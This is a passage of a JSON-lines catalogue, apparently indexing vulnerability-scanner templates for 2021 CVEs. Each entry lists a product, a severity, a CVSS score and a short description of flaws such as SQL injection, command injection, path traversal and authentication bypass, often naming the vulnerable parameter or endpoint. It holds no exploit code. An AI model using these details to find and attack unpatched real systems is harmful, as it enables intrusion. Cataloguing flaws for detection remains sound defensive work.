pathnames.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-36356.yaml"} +{"ID":"CVE-2021-36380","Info":{"Name":"Sunhillo SureLine \u003c8.7.0.1.1 - Unauthenticated OS Command Injection","Severity":"critical","Description":"Sunhillo SureLine \u003c8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-36380.yaml"} +{"ID":"CVE-2021-36450","Info":{"Name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","Severity":"medium","Description":"Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-36450.yaml"} +{"ID":"CVE-2021-3654","Info":{"Name":"Nova noVNC - Open Redirect","Severity":"medium","Description":"Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-3654.yaml"} +{"ID":"CVE-2021-36748","Info":{"Name":"PrestaHome Blog for PrestaShop \u003c1.7.8 - SQL Injection","Severity":"high","Description":"PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-36748.yaml"} +{"ID":"CVE-2021-36749","Info":{"Name":"Apache Druid - Local File Inclusion","Severity":"medium","Description":"Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-36749.yaml"} +{"ID":"CVE-2021-36873","Info":{"Name":"WordPress iQ Block Country \u003c=1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-36873.yaml"} +{"ID":"CVE-2021-37216","Info":{"Name":"QSAN Storage Manager \u003c3.3.3 - Cross-Site Scripting","Severity":"medium","Description":"QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-37216.yaml"} +{"ID":"CVE-2021-37416","Info":{"Name":"Zoho ManageEngine ADSelfService Plus \u003c=6103 - Cross-Site Scripting","Severity":"medium","Description":"Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-37416.yaml"} +{"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6- SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-37538.yaml"} +{"ID":"CVE-2021-37573","Info":{"Name":"Tiny Java Web Server - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) \u003c=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-37573.yaml"} +{"ID":"CVE-2021-37580","Info":{"Name":"Apache ShenYu Admin JWT - Authentication Bypass","Severity":"critical","Description":"Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-37580.yaml"} +{"ID":"CVE-2021-37589","Info":{"Name":"Virtua Software Cobranca \u003c12R - Blind SQL Injection","Severity":"high","Description":"Virtua Cobranca before 12R allows blind SQL injection on the login page.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-37589.yaml"} +{"ID":"CVE-2021-37704","Info":{"Name":"phpfastcache - phpinfo Resource Exposure","Severity":"medium","Description":"phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache.","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2021/CVE-2021-37704.yaml"} +{"ID":"CVE-2021-37833","Info":{"Name":"Hotel Druid 3.0.2 - Cross-Site Scripting","Severity":"medium","Description":"Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-37833.yaml"} +{"ID":"CVE-2021-38314","Info":{"Name":"Redux Framework - Unauthenticated Sensitive Information Disclosure","Severity":"medium","Description":"The Gutenberg Template Library \u0026 Redux Framework plugin \u003c= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-38314.yaml"} +{"ID":"CVE-2021-38540","Info":{"Name":"Apache Airflow - Unauthenticated Variable Import","Severity":"critical","Description":"Apache Airflow Airflow \u003e=2.0.0 and \u003c2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-38540.yaml"} +{"ID":"CVE-2021-38647","Info":{"Name":"Microsoft Open Management Infrastructure - Remote Code Execution","Severity":"critical","Description":"Microsoft Open Management Infrastructure is susceptible to remote code execution (OMIGOD).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-38647.yaml"} +{"ID":"CVE-2021-38702","Info":{"Name":"Cyberoam NetGenie Cross-Site Scripting","Severity":"medium","Description":"Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-38702.yaml"} +{"ID":"CVE-2021-38704","Info":{"Name":"ClinicCases 7.3.3 Cross-Site Scripting","Severity":"medium","Description":"ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-38704.yaml"} +{"ID":"CVE-2021-38751","Info":{"Name":"ExponentCMS \u003c= 2.6 - Host Header Injection","Severity":"medium","Description":"An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM.","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2021/CVE-2021-38751.yaml"} +{"ID":"CVE-2021-39211","Info":{"Name":"GLPI Telemetry Disclosure","Severity":"medium","Description":"GLPI =\u003e 9.2 and \u003c 9.5.6, the telemetry endpoint discloses GLPI and server information.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-39211.yaml"} +{"ID":"CVE-2021-39226","Info":{"Name":"Grafana Snapshot - Authentication Bypass","Severity":"high","Description":"Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).","Classification":{"CVSSScore":"7.3"}},"file_path":"cves/2021/CVE-2021-39226.yaml"} +{"ID":"CVE-2021-39312","Info":{"Name":"WordPress True Ranker \u003c2.2.4 - Local File Inclusion","Severity":"high","Description":"WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-39312.yaml"} +{"ID":"CVE-2021-39316","Info":{"Name":"WordPress DZS Zoomsounds \u003c=6.50 - Local File Inclusion","Severity":"high","Description":"WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-39316.yaml"} +{"ID":"CVE-2021-39320","Info":{"Name":"WordPress Under Construction \u003c1.19 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-39320.yaml"} +{"ID":"CVE-2021-39322","Info":{"Name":"WordPress Easy Social Icons Plugin \u003c 3.0.9 - Cross-Site Scripting","Severity":"medium","Description":"The Easy Social Icons plugin \u003c= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-39322.yaml"} +{"ID":"CVE-2021-39327","Info":{"Name":"WordPress BulletProof Security 5.1 Information Disclosure","Severity":"medium","Description":"The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-39327.yaml"} +{"ID":"CVE-2021-39350","Info":{"Name":"FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting","Severity":"medium","Description":"The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-39350.yaml"} +{"ID":"CVE-2021-39433","Info":{"Name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","Severity":"high","Description":"A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-39433.yaml"} +{"ID":"CVE-2021-39501","Info":{"Name":"EyouCMS 1.5.4 Open Redirect","Severity":"medium","Description":"EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-39501.yaml"} +{"ID":"CVE-2021-40149","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Private Key Disclosure","Severity":"medium","Description":"Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"cves/2021/CVE-2021-40149.yaml"} +{"ID":"CVE-2021-40150","Info":{"Name":"Reolink E1 Zoom Camera - Information Disclosure","Severity":"high","Description":"The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path.\nAn unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40150.yaml"} +{"ID":"CVE-2021-40323","Info":{"Name":"Cobbler \u003c3.3.0 - Remote Code Execution","Severity":"critical","Description":"Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-40323.yaml"} +{"ID":"CVE-2021-40438","Info":{"Name":"Apache \u003c= 2.4.48 - Mod_Proxy SSRF","Severity":"critical","Description":"Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.","Classification":{"CVSSScore":"9"}},"file_path":"cves/2021/CVE-2021-40438.yaml"} +{"ID":"CVE-2021-40539","Info":{"Name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-40539.yaml"} +{"ID":"CVE-2021-40542","Info":{"Name":"Opensis-Classic 8.0 - Cross-Site Scripting","Severity":"medium","Description":"Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-40542.yaml"} +{"ID":"CVE-2021-40661","Info":{"Name":"IND780 - Directory Traversal","Severity":"high","Description":"A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40661.yaml"} +{"ID":"CVE-2021-40822","Info":{"Name":"Geoserver - Server-Side Request Forgery","Severity":"high","Description":"GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40822.yaml"} +{"ID":"CVE-2021-40856","Info":{"Name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","Severity":"high","Description":"Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix \"/about/../\" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40856.yaml"} +{"ID":"CVE-2021-40859","Info":{"Name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","Severity":"critical","Description":"Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint (\"https://192.168.1[.]2/about_state\"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-40859.yaml"} +{"ID":"CVE-2021-40868","Info":{"Name":"Cloudron 6.2 Cross-Site Scripting","Severity":"medium","Description":"In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-40868.yaml"} +{"ID":"CVE-2021-40870","Info":{"Name":"Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution","Severity":"critical","Description":"Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-40870.yaml"} +{"ID":"CVE-2021-40875","Info":{"Name":"Gurock TestRail Application files.md5 Exposure","Severity":"high","Description":"Improper access control in Gurock TestRail versions \u003c 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40875.yaml"} +{"ID":"CVE-2021-40960","Info":{"Name":"Galera WebTemplate 1.0 Directory Traversal","Severity":"critical","Description":"Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-40960.yaml"} +{"ID":"CVE-2021-40978","Info":{"Name":"MKdocs 1.2.2 - Directory Traversal","Severity":"high","Description":"The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-40978.yaml"} +{"ID":"CVE-2021-41174","Info":{"Name":"Grafana 8.0.0 \u003c= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","Severity":"medium","Description":"Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-41174.yaml"} +{"ID":"CVE-2021-41192","Info":{"Name":"Redash Setup Configuration - Default Secrets Disclosure","Severity":"medium","Description":"Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions \u003c=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-41192.yaml"} +{"ID":"CVE-2021-41266","Info":{"Name":"MinIO Operator Console Authentication Bypass","Severity":"critical","Description":"MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-41266.yaml"} +{"ID":"CVE-2021-41277","Info":{"Name":"Metabase Local File Inclusion","Severity":"high","Description":"Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin-\u003esettings-\u003emaps-\u003ecustom maps-\u003eadd a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-41277.yaml"} +{"ID":"CVE-2021-41282","Info":{"Name":"pfSense - Arbitrary File Write","Severity":"high","Description":"diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-41282.yaml"} +{"ID":"CVE-2021-41291","Info":{"Name":"ECOA Building Automation System - Directory Traversal Content Disclosure","Severity":"high","Description":"The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-41291.yaml"} +{"ID":"CVE-2021-41293","Info":{"Name":"ECOA Building Automation System - Arbitrary File Retrieval","Severity":"high","Description":"The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-41293.yaml"} +{"ID":"CVE-2021-41349","Info":{"Name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","Severity":"medium","Description":"Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2021/CVE-2021-41349.yaml"} +{"ID":"CVE-2021-41381","Info":{"Name":"Payara Micro Community 5.2021.6 Directory Traversal","Severity":"high","Description":"Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-41381.yaml"} +{"ID":"CVE-2021-41432","Info":{"Name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","Severity":"medium","Description":"FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2021/CVE-2021-41432.yaml"} +{"ID":"CVE-2021-41467","Info":{"Name":"JustWriting - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-41467.yaml"} +{"ID":"CVE-2021-41569","Info":{"Name":"SAS/Internet 9.4 1520 - Local File Inclusion","Severity":"high","Description":"SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-41569.yaml"} +{"ID":"CVE-2021-41648","Info":{"Name":"PuneethReddyHC action.php SQL Injection","Severity":"high","Description":"An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-41648.yaml"} +{"ID":"CVE-2021-41649","Info":{"Name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","Severity":"critical","Description":"An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-41649.yaml"} +{"ID":"CVE-2021-41653","Info":{"Name":"TP-Link - OS Command Injection","Severity":"critical","Description":"The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-41653.yaml"} +{"ID":"CVE-2021-41691","Info":{"Name":"openSIS Student Information System 8.0 SQL Injection","Severity":"high","Description":"openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2021/CVE-2021-41691.yaml"} +{"ID":"CVE-2021-41773","Info":{"Name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","Severity":"high","Description":"A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \"require all denied\" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-41773.yaml"} +{"ID":"CVE-2021-41826","Info":{"Name":"PlaceOS 1.2109.1 - Open Redirection","Severity":"medium","Description":"PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-41826.yaml"} +{"ID":"CVE-2021-41878","Info":{"Name":"i-Panel Administration System 2.0 - Cross-Site Scripting","Severity":"medium","Description":"i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-41878.yaml"} +{"ID":"CVE-2021-4191","Info":{"Name":"GitLab GraphQL API User Enumeration","Severity":"medium","Description":"An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-4191.yaml"} +{"ID":"CVE-2021-41951","Info":{"Name":"Resourcespace - Cross-Site Scripting","Severity":"medium","Description":"ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-41951.yaml"} +{"ID":"CVE-2021-42013","Info":{"Name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","Severity":"critical","Description":"A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \"require all denied\" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-42013.yaml"} +{"ID":"CVE-2021-42063","Info":{"Name":"SAP Knowledge Warehouse \u003c=7.5.0 - Cross-Site Scripting","Severity":"medium","Description":"SAP Knowledge Warehouse 7.30, 7.31, 7.40, and 7.50 contain a reflected cross-site scripting vulnerability via the usage of one SAP KW component within a web browser.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-42063.yaml"} +{"ID":"CVE-2021-42071","Info":{"Name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","Severity":"critical","Description":"Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-42071.yaml"} +{"ID":"CVE-2021-42192","Info":{"Name":"KONGA 0.14.9 - Privilege Escalation","Severity":"high","Description":"KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-42192.yaml"} +{"ID":"CVE-2021-42237","Info":{"Name":"Sitecore Experience Platform Pre-Auth RCE","Severity":"critical","Description":"Sitecore XP 7.5 to Sitecore XP 8.2 Update 7 is vulnerable to an insecure deserialization attack where remote commands can be executed by an attacker with no authentication or special configuration required.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-42237.yaml"} +{"ID":"CVE-2021-42258","Info":{"Name":"BillQuick Web Suite SQL Injection","Severity":"critical","Description":"BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-42258.yaml"} +{"ID":"CVE-2021-42551","Info":{"Name":"NetBiblio WebOPAC - Cross-Site Scripting","Severity":"medium","Description":"NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-42551.yaml"} +{"ID":"CVE-2021-42565","Info":{"Name":"myfactory FMS - Cross-Site Scripting","Severity":"medium","Description":"myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-42565.yaml"} +{"ID":"CVE-2021-42566","Info":{"Name":"myfactory FMS - Cross-Site Scripting","Severity":"medium","Description":"myfactory.FMS before 7.1-912 allows cross-site scripting via the Error 